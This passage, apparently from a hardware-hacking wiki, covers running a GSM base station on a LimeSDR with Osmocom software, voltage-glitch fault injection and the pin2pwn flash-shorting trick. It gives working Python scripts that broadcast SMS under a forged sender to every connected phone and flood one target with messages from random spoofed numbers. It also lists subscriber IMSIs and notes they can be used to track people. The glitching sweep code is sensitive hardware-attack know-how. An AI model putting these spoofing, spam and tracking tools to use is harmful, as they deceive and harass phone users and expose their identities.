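        findings.append('encryption a5 0: no air-interface encryption, calls and SMS are in the clear')
    return findings

# constructed from the config shown above (only the lines the audit looks at, plus one bts line)
CONFIG = '''!
! constructed excerpt
!
e1_input
 e1_line 0 driver ipa
network
 network country code 901
 mobile network code 70
 short name HUEHUE
 long name HUEBRNetwork
 auth policy accept-all
 encryption a5 0
 bts 0
  type sysmobts
'''

if __name__ == '__main__':
    for finding in audit(CONFIG):
        print('-', finding)
```

Run it against the real openbsc.cfg before starting osmo-nitb; the corrected file passes once the policy is `closed` (or `token`), A5/1 or better is enabled and the PLMN is one you are allowed to transmit as.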

That openbsc.cfg file will be used by osmo-nitb software. The next file is osmo-bts.cfg

!\n! OsmoBTS configuration example\n!!\n!\nlog stderr\n  logging color 1\n  logging timestamp 0\n  logging level rsl notice\n  logging level oml notice\n  logging level rll notice\n  logging level rr notice\n  logging level loop debug\n  logging level meas debug\n  logging level pag error\n  logging level l1c error\n  logging level l1p error\n  logging level dsp error\n  logging level abis error\n\n!\nline vty\n no login\n!\nphy 0\n instance 0\n  osmotrx rx-gain 40\n  osmotrx tx-attenuation 50\n osmotrx ip local 127.0.0.1\n osmotrx ip remote 127.0.0.1\n no osmotrx timing-advance-loop\nbts 0\n oml remote-ip 127.0.0.1\n ipa unit-id 1801 0\n gsmtap-sapi pdtch\n gsmtap-sapi ccch\n band 900\n trx 0\n  phy 0 instance 0\n

The only important parameter to take care of here is band. Make sure it is the same as in the openbsc.cfg file. The next one is osmo-trx.cfg, which will be used by osmo-trx-lms:

log stderr\n logging filter all 1\n logging color 1\n logging print category 1\n logging timestamp 1\n logging print file basename\n logging level set-all info\n!\nline vty\n no login\n!\ntrx\n bind-ip 127.0.0.1\n remote-ip 127.0.0.1\n base-port 5700\n egprs disable\n tx-sps 4\n rx-sps 4\n rt-prio 18\n chan 0\n  tx-path BAND1\n  rx-path LNAW\n

There is not much to change here. If you're using a multi-port LimeSDR (like the LimeSDR USB or PCIe) you can change the tx-path and rx-path parameters to the desired paths.

"},{"location":"radio-frequency/limesdr-bts/#running-the-software-stack","title":"Running the software stack","text":"

There are a few programs to run to get the BTS working. You should run all of them from the folder you created the configuration files.

The first one we should run is osmo-trx-lms. This one should be run as root to enable high-priority scheduling (especially needed if you're running on a small SBC like a Raspberry Pi).

sudo osmo-trx-lms\n

The second one is osmo-nitb, which is the base station controller. This one doesn't need to be run as root.

osmo-nitb\n

And the last software is the osmo-bts-trx which handles the transceiver:

osmo-bts-trx\n

Now your base station should be running.

"},{"location":"radio-frequency/limesdr-bts/#testing-the-base-station","title":"Testing the Base Station","text":"

The best way to test is to have a custom simcard like this one:

But since we set the BTS to accept-all mode, you can just go to your phone network settings and select the created network. That will work fine if you have an Android phone which allows you to select custom networks:

Here is the network I just created with MCC 724 and MNC 70. In some simcards it is required that the MCC is the same as sim country (for example here it only shows if the network is at 724).

After connecting to the network, the name should appear instead of the MCC+MNC code:

"},{"location":"radio-frequency/limesdr-bts/#listing-subscribers","title":"Listing Subscribers","text":"

There is a simple python script to list the subscribers. What it does is to open the sqlite database and do a simple query and print.

#!/usr/bin/env python3\nimport sqlite3\n\nHLR_DATABASE = \"hlr.sqlite3\"\ndb = sqlite3.connect(HLR_DATABASE)\nc = db.cursor()\nc.execute(\"SELECT * FROM Subscriber\")\n\nprint(\"ID\\t\\tcreated\\t\\tIMSI\\t\\t\\tTMSI\\t\\textension\\n\")\nfor subscriber in c:\n    # columns used from the Subscriber table: 0=id, 1=created, 3=imsi, 5=extension, 7=tmsi\n    print(\"{0:1}\\t{1:2}\\t{2:<15}\\t\\t{3:<10}\\t{4}\".format(\n            subscriber[0],\n            subscriber[1],\n            subscriber[3],\n            subscriber[7],\n            subscriber[5]\n            ))\n\ndb.close()\n

The IMSI field is unique to that phone / simcard combination. That\u2019s the number you can use to track a specific user around the world. The extension is the assigned phone number for that specific phone.

"},{"location":"radio-frequency/limesdr-bts/#sending-sms","title":"Sending SMS","text":"

There are two scripts I found in the internet to send SMS. They basically selects the IMSI from the sqlite database the Osmo stack creates and then connects through the telnet interface to issue the desired commands. One of them is sms_broadcast.py:

#!/usr/bin/env python3\nimport telnetlib\nimport sqlite3\nimport sys\n\nimsi = 999999999999999\nHLR_DATABASE = \"hlr.sqlite3\"\nPROMPT = b\"OpenBSC> \"\nENABLE_PROMPT = b\"OpenBSC# \"\n\ndef cmd(line, prompt=PROMPT):\n    # send one VTY command and return everything up to the next prompt\n    conn.write(line.encode() + b\"\\n\")\n    return conn.read_until(prompt)\n\ndef check_extension(extension):\n    res = cmd(\"show subscriber extension %s\" % extension)\n    if b\"No subscriber found for extension\" in res:\n        create_subscriber(extension)\n\ndef create_subscriber(extension):\n    print(\"No user with extension %s found. Creating new...\" % extension)\n    print(\"Extension: %s, IMSI: %d\" % (extension, imsi))\n\n    res = cmd(\"show subscriber imsi %d\" % imsi)\n    if b\"No subscriber found for imsi\" in res:\n        cmd(\"subscriber create imsi %d\" % imsi)\n\n    # assigning an extension needs privileged (enable) mode\n    cmd(\"enable\", ENABLE_PROMPT)\n    cmd(\"subscriber imsi %d extension %s\" % (imsi, extension), ENABLE_PROMPT)\n    cmd(\"disable\")\n\ndef get_users():\n    # yields the subscriber ids stored in the HLR database\n    db = sqlite3.connect(HLR_DATABASE)\n    c = db.cursor()\n    c.execute(\"SELECT id FROM Subscriber\")\n    rows = c.fetchall()\n    db.close()\n    for subscriber in rows:\n        yield subscriber[0]\n\ndef send_sms(id, extension, message):\n    res = cmd(\"subscriber id %d sms sender extension %s send %s\" % (id, extension, message))\n    if b\"%\" in res:\n        # the VTY prefixes error messages with %\n        print(res.decode(errors=\"replace\"))\n        exit(1)\n\nif __name__ == \"__main__\":\n    if len(sys.argv) < 3:\n        print(\"usage: ./sms_broadcast.py extension message\")\n        print(\"This script sends a message from the specified extension (number) to all devices connected to this base station\")\n        exit(1)\n    extension = sys.argv[1]\n    message = \" \".join(sys.argv[2:])\n\n    conn = telnetlib.Telnet(\"127.0.0.1\", 4242)\n    conn.read_until(PROMPT)\n\n    check_extension(extension)\n\n    for id in get_users():\n        send_sms(id, extension, message)\n

This one is pretty simple to use:

python sms_broadcast.py \"source number\" \"message\"\n
This will send an SMS to all connected devices as if it came from the source number.

Another option is to target a single user:

#!/usr/bin/env python3\nimport telnetlib\nimport sys\nimport random\nimport time\n\nimsi = 999999999999999\nPROMPT = b\"OpenBSC> \"\nENABLE_PROMPT = b\"OpenBSC# \"\n\ndef cmd(line, prompt=PROMPT):\n    # send one VTY command and return everything up to the next prompt\n    conn.write(line.encode() + b\"\\n\")\n    return conn.read_until(prompt)\n\ndef check_extension(extension):\n    res = cmd(\"show subscriber extension %s\" % extension)\n    if b\"No subscriber found for extension\" in res:\n        print(\"Phone with extension %s not found ;(\" % extension)\n        exit(1)\n\ndef check_spam_subscriber():\n    # the sender is a dummy subscriber that only exists in the HLR\n    res = cmd(\"show subscriber imsi %d\" % imsi)\n    if b\"No subscriber found for imsi\" in res:\n        print(cmd(\"subscriber create imsi %d\" % imsi))\n\ndef send(extension, spam_number, message):\n    print(\"Sending sms from %d...\" % spam_number)\n\n    # re-assign the dummy subscriber's extension so every SMS shows a different sender\n    cmd(\"enable\", ENABLE_PROMPT)\n    cmd(\"subscriber imsi %d extension %d\" % (imsi, spam_number), ENABLE_PROMPT)\n    cmd(\"disable\")\n\n    res = cmd(\"subscriber extension %s sms sender extension %d send %s\" % (extension, spam_number, message))\n    if b\"%\" in res:\n        # the VTY prefixes error messages with %\n        print(res.decode(errors=\"replace\"))\n        exit(1)\n\nif __name__ == \"__main__\":\n    if len(sys.argv) < 4 or not sys.argv[2].isdigit():\n        print(\"usage: ./sms_spam.py extension [num of repeats] message\")\n        print(\"This script sends a message to the specified number\")\n        exit(1)\n    extension = sys.argv[1]\n    repeats = int(sys.argv[2])\n    message = \" \".join(sys.argv[3:])\n\n    conn = telnetlib.Telnet(\"127.0.0.1\", 4242)\n    conn.read_until(PROMPT)\n\n    check_extension(extension)\n    check_spam_subscriber()\n\n    for _ in range(repeats):\n        spam_number = random.randint(1000, 9999)\n        send(extension, spam_number, message)\n        time.sleep(2)\n

This one generates a random source number and sends the specified message n times.

python sms_spam.py \"target number\" \"number of times\" \"message\"\n
"},{"location":"radio-frequency/limesdr-bts/#references","title":"References","text":""},{"location":"radio-frequency/sdr/","title":"SDR","text":""},{"location":"radio-frequency/sdr/#frequency-independent-sdr-based-signal-understanding-and-reverse-engineering","title":"Frequency Independent SDR-based Signal Understanding and Reverse Engineering","text":"

https://github.com/ainfosec/FISSURE

"},{"location":"secure-boot/","title":"Secure Boot","text":""},{"location":"secure-boot/#references","title":"References","text":""},{"location":"side-channel/fault-injection/","title":"Fault Injection","text":""},{"location":"side-channel/fault-injection/#power-vcc-voltage-glitch","title":"Power / VCC - Voltage Glitch","text":"

Power glitch injection is a physical attack technique used to test and exploit vulnerabilities in electronic devices by causing controlled, temporary power disturbances. A VCC glitch, also known as a supply voltage glitch, is a specific type of power glitch attack targeting the voltage supply (VCC) of a microcontroller or integrated circuit (IC) in electronic devices.

Most of the time the goal is one of the following:

Tools

Voltage Glitching with Crowbars

import faultier\nimport serial\n\n# open the glitcher and the target's serial console exposed through the Faultier\nft = faultier.Faultier()\nser = serial.Serial(ft.get_serial_path(), baudrate=115200)\nser.timeout = 0.3\n\n# trigger from EXT0 on a positive pulse, glitch by crowbarring the target's VCC\nft.configure_glitcher(\n    trigger_source = faultier.TRIGGER_IN_EXT0,\n    trigger_type = faultier.TRIGGER_PULSE_POSITIVE,\n    glitch_output = faultier.OUT_CROWBAR\n)\n# delay after the trigger and width of the crowbar pulse (units as defined by the faultier library)\nft.glitch(delay = 1000, pulse = 1)\nprint(ser.read(3))\n
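A single `ft.glitch(delay=1000, pulse=1)` call is one point in a two-dimensional search: the right delay after the trigger and the right pulse width are unknown up front and every glitch only lands with some probability, so in practice a campaign sweeps both parameters and repeats each point. The added example below (not code from the page or from the faultier project) wraps that search around two callables, so the same logic drives the faultier calls shown above (the adapter uses only `glitch(delay=, pulse=)` and `ser.read(3)`, as on the page) or a constructed simulated target that only reports success inside a narrow delay window and for short pulses. The success criterion (reading back the constructed marker `b'ok!'`) is an assumption for the example.

```python
# Added example: a delay/pulse sweep for voltage glitching. The faultier adapter uses only
# the API shown on the page; SimulatedTarget and the b'ok!' success marker are constructed.
import itertools
import random

def run_campaign(glitch, read_response, delays, pulses, is_success, tries_per_point=3):
    # sweep every (delay, pulse) pair; each point is retried because a glitch lands
    # probabilistically, and a point is recorded once it succeeds at least once
    hits = []
    for delay, pulse in itertools.product(delays, pulses):
        for _ in range(tries_per_point):
            glitch(delay, pulse)
            if is_success(read_response()):
                hits.append((delay, pulse))
                break
    return hits

def faultier_backend(ft, ser):
    # adapter for the page's faultier/pyserial objects: (glitch callable, read callable)
    return (lambda delay, pulse: ft.glitch(delay=delay, pulse=pulse)), (lambda: ser.read(3))

class SimulatedTarget:
    # constructed stand-in for a board: the glitch only takes effect within a delay window
    # and for pulses up to max_pulse, and even then only 70% of the time
    def __init__(self, window=(1180, 1220), max_pulse=3, seed=1):
        self.window, self.max_pulse = window, max_pulse
        self.rng = random.Random(seed)
        self.last = b'no!'

    def glitch(self, delay, pulse):
        in_window = self.window[0] <= delay <= self.window[1] and pulse <= self.max_pulse
        self.last = b'ok!' if in_window and self.rng.random() < 0.7 else b'no!'

    def read(self):
        return self.last

def demo():
    # coarse sweep over 20 delay steps and three pulse widths against the simulated target
    target = SimulatedTarget()
    return run_campaign(target.glitch, target.read, range(1000, 1400, 20), (1, 2, 5),
                        lambda response: response == b'ok!')

if __name__ == '__main__':
    print('successful (delay, pulse) points:', demo())
```

Against real hardware, replace the simulated callables with `faultier_backend(ft, ser)` and narrow the ranges around the hits from a coarse pass; the repeated tries per point are what separate a genuinely glitchable parameter from a one-off.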

Challenges

"},{"location":"side-channel/fault-injection/#electromagnetic-fault","title":"Electromagnetic Fault","text":"

Electromagnetic Fault Injection is an advanced technique used in hardware security and testing, where electromagnetic pulses are used to induce faults in electronic devices

Tools

Challenges

"},{"location":"side-channel/fault-injection/#clock-glitch","title":"Clock Glitch","text":"

This technique involves momentarily disrupting or altering the clock signal of a device to induce errors or malfunctions in its operation.

Challenges

"},{"location":"side-channel/fault-injection/#pin2pwn","title":"Pin2pwn","text":"

pin2pwn: How to Root an Embedded Linux Box with a Sewing Needle - Brad Dixon - Carve Systems - DEFCON 24

In the case of an external SPI flash, it is possible for an attacker to short these pins:

The MCU will not be able to read data from the external flash and may then print a stack trace, drop into a bootloader shell or, worse, a root shell on the embedded Linux.

Here is a practical example, putting a cable between MOSI and Chip Select:

"},{"location":"side-channel/fault-injection/#references","title":"References","text":""}]}